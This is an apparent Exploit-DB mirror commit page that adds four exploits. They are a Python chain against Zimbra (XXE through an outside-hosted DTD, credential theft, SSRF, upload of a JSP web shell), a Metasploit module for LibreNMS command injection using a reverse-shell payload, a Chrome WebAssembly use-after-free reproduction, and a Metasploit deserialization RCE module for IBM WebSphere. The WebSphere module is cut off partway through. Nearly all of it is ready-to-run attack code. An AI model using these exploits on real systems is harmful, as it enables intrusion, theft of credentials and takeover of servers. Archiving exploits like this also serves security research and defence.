bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-06-06

Browse source 
4 changes to exploits/shellcodes

Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
LibreNMS - addhost Command Injection (Metasploit)

Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
This commit is contained in:
Offensive Security 2019-06-06 05:01:56 +00:00
parent 76be51b7d6
commit e76aee5eaf
5 changed files with 999 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

107
exploits/jsp/webapps/46967.py Executable file
View file

@ -0,0 +1,107 @@
#coding=utf8
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
base_url=sys.argv[1]
base_url=base_url.rstrip("/")
#upload file name and content
#modify by k8gege
#Connect "shell.jsp" using K8fly CmdShell
#Because the CMD parameter is encrypted using Base64(bypass WAF)
filename = "shell.jsp"
fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
"""
xxe_data = r"""<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "{dtd}">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>""".format(dtd=dtd_url)
#XXE stage
headers = {
"Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
print("have no xxe")
exit()
#low_token Stage
import re
pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
print(password)
auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="{xmlns}">
<account by="adminName">{username}</account>
<password>{password}</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
"""
print("[*] Get Low Privilege Auth Token")
r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)
pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")
low_priv_token = pattern_auth_token.findall(r.text)[0]
#print(low_priv_token)
# SSRF+Get Admin_Token Stage
headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
headers["Host"]="foo:7071"
print("[*] Get Admin Auth Token By SSRF")
r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)
admin_token =pattern_auth_token.findall(r.text)[0]
#print("ADMIN_TOKEN:"+admin_token)
f = {
'filename1':(None,"whocare",None),
'clientFile':(filename,fileContent,"text/plain"),
'requestId':(None,"12",None),
}
headers ={
"Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
}
print("[*] Uploading file")
r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
#print(r.text)
print("Shell: "+base_url+"/downloads/"+filename)
#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
print("[*] Request Result:")
s = requests.session()
r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
#print(r.text)
print("May need cookie:")
print(headers['Cookie'])

163
exploits/linux/remote/46970.rb Executable file
View file

@ -0,0 +1,163 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LibreNMS addhost Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in the open source
network management software known as LibreNMS. The community parameter used
in a POST request to the addhost functionality is unsanitized. This parameter
is later used as part of a shell command that gets passed to the popen function
in capture.inc.php, which can result in execution of arbitrary code.
This module requires authentication to LibreNMS first.
),
'License' => MSF_LICENSE,
'Author' =>
[
'mhaskar', # Vulnerability discovery and PoC
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-20434' ],
[ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
[ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
],
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Linux',
{
'Platform' => 'unix',
'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }
}
]
],
'DisclosureDate' => '2018-12-16',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
])
end
def login
login_uri = normalize_uri(target_uri.path, 'login')
res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200
cookies = res.get_cookies
login_res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' =>
{
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302
cookies = login_res.get_cookies
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies)
fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')
print_status('Successfully logged into LibreNMS. Storing credentials...')
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
login_res.get_cookies
end
def add_device(cookies)
add_uri = normalize_uri(target_uri.path, 'addhost')
@hostname = Rex::Text.rand_text_alpha(6...12)
comm_payload = "'; #{payload.encoded}#'"
res = send_request_cgi(
'method' => 'POST',
'uri' => add_uri,
'cookie' => cookies,
'vars_post' =>
{
'snmp' => 'on',
'force_add' => 'on',
'snmpver' => 'v2c',
'hostname' => @hostname,
'community' => comm_payload,
'authalgo' => 'MD5',
'cryptoalgo' => 'AES',
'transport' => 'udp',
'port_assoc_mode' => 'ifIndex'
}
)
fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')
print_good("Successfully added device with hostname #{@hostname}")
host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text
fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty?
host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/)
fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?
host_id
end
def del_device(id, cookies)
del_uri = normalize_uri(target_uri.path, 'delhost')
res = send_request_cgi(
'method' => 'POST',
'uri' => del_uri,
'cookie' => cookies,
'vars_post' =>
{
'id' => id,
'confirm' => 1
}
)
print_status('Unsure if device was deleted. No response received') unless res
if res.body.include?("Removed device #{@hostname.downcase}")
print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}")
else
print_status('Failed to delete device. Manual deletion may be needed')
end
end
def exploit
exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')
cookies = login
host_id = add_device(cookies)
send_request_cgi(
'method' => 'GET',
'uri' => exp_uri,
'cookie' => cookies,
'vars_get' =>
{
'id' => 'capture',
'format' => 'text',
'type' => 'snmpwalk',
'hostname' => @hostname
}
)
del_device(host_id, cookies)
end
end

75
exploits/multiple/dos/46968.html Normal file
View file

@ -0,0 +1,75 @@
<!--
VULNERABILITY DETAILS
https://cs.chromium.org/chromium/src/v8/src/wasm/wasm-objects.cc?rcl=783343158eb1b147df7e6669f1d03c690c878e21&l=1253
```
int32_t WasmMemoryObject::Grow(Isolate* isolate,
Handle<WasmMemoryObject> memory_object,
uint32_t pages) {
[...]
Handle<JSArrayBuffer> new_buffer;
if (old_buffer->is_shared()) {
// Adjust protections for the buffer.
if (!AdjustBufferPermissions(isolate, old_buffer, new_size)) {
return -1;
}
void* backing_store = old_buffer->backing_store();
if (memory_tracker->IsWasmSharedMemory(backing_store)) {
// This memory is shared between different isolates.
DCHECK(old_buffer->is_shared());
// Update pending grow state, and trigger a grow interrupt on all the
// isolates that share this buffer.
memory_tracker->SetPendingUpdateOnGrow(old_buffer, new_size);
// Handle interrupts for this isolate so that the instances with this
// isolate are updated.
isolate->stack_guard()->HandleInterrupts();
// Failure to allocate, or adjust pemissions already handled here, and
// updates to instances handled in the interrupt handler safe to return.
return static_cast<uint32_t>(old_size / wasm::kWasmPageSize);
}
// SharedArrayBuffer, but not shared across isolates. Setup a new buffer
// with updated permissions and update the instances.
new_buffer =
wasm::SetupArrayBuffer(isolate, backing_store, new_size, // ***1***
old_buffer->is_external(), SharedFlag::kShared);
memory_object->update_instances(isolate, new_buffer);
[...]
```
When `Grow` is called on a `WebAssembly.Memory` object that's backed by a `SharedArrayBuffer`, it
uses the buffer's backing store pointer to construct a new array buffer[1]. Calling `Detach` on
shared buffers is prohibited by the spec, so the the method just leaves the old one as it is. Thus
two array buffers might end up owning the same backing store, and if one of the them got garbage
collected, the other one would point to a freed memory region.
Blink's SharedArrayBuffer implementation uses reference-counted backing stores, so v8 should
probably implement something similar.
VERSION
Google Chrome 73.0.3683.103 (Official Build) (64-bit) (cohort: Stable)
Chromium 75.0.3758.0 (Developer Build) (64-bit)
This bug affects the stable branch due to the currently active "WebAssembly Threads" Origin Trial.
https://developers.chrome.com/origintrials/#/view_trial/-5026017184145473535
REPRODUCTION CASE
-->
<script>
function gc() {
for (let i = 0; i < 50; ++i) {
let buffer = new ArrayBuffer(1024 * 1024);
}
}
setInterval(() => {
memory = new WebAssembly.Memory({initial: 1, maximum: 2, shared: true});
memory.grow(1);
gc();
array = new Int8Array(memory.buffer);
array[0x1337] = 1;
});
</script>
<!--
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
-->

650
exploits/windows/remote/46969.rb Executable file
View file

@ -0,0 +1,650 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
'Description' => %(
This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
),
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
],
'References' =>
[
['CVE', '2019-8352'],
['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
],
'Platform' => ['win'],
'Targets' =>
[
[
'Windows Binary', {
'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win'
}
],
[
'CMD', {
'Arch' => ARCH_CMD,
'Platform' => 'win',
'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
}
]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2019'))
register_options(
[
Opt::RPORT(11006), # 11002,11004,11006,etc
OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
]
)
end
def cleanup
disconnect
print_status('Disconnected from IBM Websphere DMGR.')
super
end
def exploit
command = nil
if target.name == 'CMD'
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
command = datastore['CMD']
end
# Connect to IBM Websphere Application Server
connect
print_status("Connected to IBM WAS DMGR.")
node_port = datastore['RPORT']
# Send packet to add neighbor
enc_stream = construct_tcp_node_msg(node_port)
send_msg(enc_stream)
sock.get_once
print_status('Server responded')
# Generate binary name
bin_name = rand_text_alpha(8)
if command
command = datastore['CMD']
payload_contents = command.to_s
print_status('Executing command: ' + payload_contents)
bin_name << ".bat"
else
payload_contents = generate_payload_exe(code: payload.generate)
bin_name << ".exe"
end
print_status("Sending payload: #{bin_name}")
enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
send_msg(enc_stream)
register_file_for_cleanup(bin_name)
end
def send_msg(enc_stream)
pkt = [0x396fb74a].pack('N')
pkt += [enc_stream.length + 1].pack('N')
pkt += "\x00"
pkt += enc_stream
# Send msg
sock.put(pkt)
end
def construct_tcp_node_msg(node_port)
p2p_obj = Rex::Java::Serialization::Model::NewObject.new
p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
# Create the obj
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
# Create the stream and add the object
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.encode
end
def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
# Add upload file argument
byte_arr = byte_str.unpack("C*")
upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
# Create the obj
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
# Create the stream and add the object
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object
stream.encode
end
def build_message(obj, msg_id, msg_type, orig_cell_field_type)
# Create the integer field and add the reference
id_field = Rex::Java::Serialization::Model::Field.new
id_field.type = 'int'
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
# Create the integer field and add the reference
type_field = Rex::Java::Serialization::Model::Field.new
type_field.type = 'int'
type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
# Create the object field and add the reference
new_field = Rex::Java::Serialization::Model::Field.new
new_field.type = 'object'
new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
new_field.field_type = orig_cell_field_type
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << id_field
msg_class_desc.fields << type_field
msg_class_desc.fields << new_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Set the member values
obj.class_data << ['int', msg_id]
obj.class_data << ['int', msg_type]
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
msg_class_desc
end
def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
prng = Random.new
msg_id = prng.rand(4294967295)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
msg_obj = build_message(obj, msg_id, msg_type, field_ref)
# Create the integer field and add the reference
id_field = Rex::Java::Serialization::Model::Field.new
id_field.type = 'int'
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
# Create the integer field and add the reference
port_field = Rex::Java::Serialization::Model::Field.new
port_field.type = 'int'
port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
# Create the object field and add the reference
ip_arr_field = Rex::Java::Serialization::Model::Field.new
ip_arr_field.type = 'array'
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << id_field
msg_class_desc.fields << port_field
msg_class_desc.fields << ip_arr_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Construct IP Array
ip_arr = source_ip.split(".").map(&:to_i)
builder = Rex::Java::Serialization::Builder.new
values_array = builder.new_array(
values_type: 'byte',
values: ip_arr,
name: '[B',
serial: 0x42acf317f8060854e0,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
# Set the member values
obj.class_data << ['int', msg_id]
obj.class_data << ['int', source_port]
obj.class_data << values_array
msg_class_desc
end
def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
prng = Random.new
msg_id = prng.rand(4294967295)
# Create the field type for the origCell
field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
msg_obj = build_message(obj, msg_id, msg_type, field_type)
# Create the port field and add the reference
boot_time_field = Rex::Java::Serialization::Model::Field.new
boot_time_field.type = 'long'
boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
# Create the port field and add the reference
tcp_port_field = Rex::Java::Serialization::Model::Field.new
tcp_port_field.type = 'int'
tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
# Create the port field and add the reference
udp_port_field = Rex::Java::Serialization::Model::Field.new
udp_port_field.type = 'int'
udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
# Create the object field and add the reference
ip_arr_field = Rex::Java::Serialization::Model::Field.new
ip_arr_field.type = 'array'
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
# Create the task object field and add field_type
node_prop_field = Rex::Java::Serialization::Model::Field.new
node_prop_field.type = 'object'
node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << boot_time_field
msg_class_desc.fields << tcp_port_field
msg_class_desc.fields << udp_port_field
msg_class_desc.fields << ip_arr_field
msg_class_desc.fields << node_prop_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Construct IP Array
ip_arr = source_ip.split(".").map(&:to_i)
builder = Rex::Java::Serialization::Builder.new
values_array = builder.new_array(
values_type: 'byte',
values: ip_arr,
name: '[B',
serial: 0x42acf317f8060854e0,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
# Set the member values
obj.class_data << ['long', 0]
obj.class_data << ['int', source_port]
obj.class_data << ['int', source_port]
obj.class_data << values_array
obj.class_data << p2p_obj
msg_class_desc
end
def build_app_node_class(obj)
# Create the structured gateway field and add the reference
struct_bool_field = Rex::Java::Serialization::Model::Field.new
struct_bool_field.type = 'boolean'
struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
# Create the version field and add the reference
version_field = Rex::Java::Serialization::Model::Field.new
version_field.type = 'int'
version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
# Create the object field and add the reference
bridge_field = Rex::Java::Serialization::Model::Field.new
bridge_field.type = 'object'
bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
# Create the cellname field and add the reference
cellname_field = Rex::Java::Serialization::Model::Field.new
cellname_field.type = 'object'
cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
cellname_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << struct_bool_field
msg_class_desc.fields << version_field
msg_class_desc.fields << bridge_field
msg_class_desc.fields << cellname_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Set the member values
obj.class_data << ['boolean', 0]
obj.class_data << ['int', 0]
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
msg_class_desc
end
def build_hashtable_class(obj)
# Create the integer field and add the reference
load_field = Rex::Java::Serialization::Model::Field.new
load_field.type = 'float'
load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
# Create the integer field and add the reference
threshold_field = Rex::Java::Serialization::Model::Field.new
threshold_field.type = 'int'
threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
msg_class_desc.serial_version = 0x13BB0F25214AE4B8
msg_class_desc.flags = 3
msg_class_desc.fields = []
msg_class_desc.fields << load_field
msg_class_desc.fields << threshold_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
obj.class_data << ['float', 0.75]
obj.class_data << ['int', 8]
obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
msg_class_desc
end
def build_properties_class
# Create the object
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
msg_obj = build_hashtable_class(object)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
# Create the integer field and add the reference
defaults_field = Rex::Java::Serialization::Model::Field.new
defaults_field.type = 'object'
defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
defaults_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
msg_class_desc.serial_version = 0x3912D07A70363E98
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << defaults_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Set the member values
object.class_desc.description = msg_class_desc
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
object
end
def build_p2p_node_class(obj)
msg_obj = build_app_node_class(obj)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the data field and add the reference
data_field = Rex::Java::Serialization::Model::Field.new
data_field.type = 'array'
data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
data_field.field_type = field_ref
# Create the object field and add the reference
prop_field = Rex::Java::Serialization::Model::Field.new
prop_field.type = 'object'
prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
msg_class_desc.serial_version = 2
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << data_field
msg_class_desc.fields << prop_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Create the byte array ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
# Construct IP Array
byte_array = Rex::Java::Serialization::Model::NewArray.new
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
byte_array.array_description.description = field_ref
byte_array.type = "byte"
byte_array.values = []
# Set the member values
obj.class_data << byte_array
# Add properties
obj.class_data << build_properties_class
msg_class_desc
end
def build_upfile_arg_class(filename, bytes, cmd)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the integer field and add the reference
filename_field = Rex::Java::Serialization::Model::Field.new
filename_field.type = 'object'
filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
filename_field.field_type = field_ref
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
# Create the integer field and add the reference
filebody_field = Rex::Java::Serialization::Model::Field.new
filebody_field.type = 'array'
filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
filebody_field.field_type = field_ref
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the object field and add the reference
post_cmd_field = Rex::Java::Serialization::Model::Field.new
post_cmd_field.type = 'object'
post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
post_cmd_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
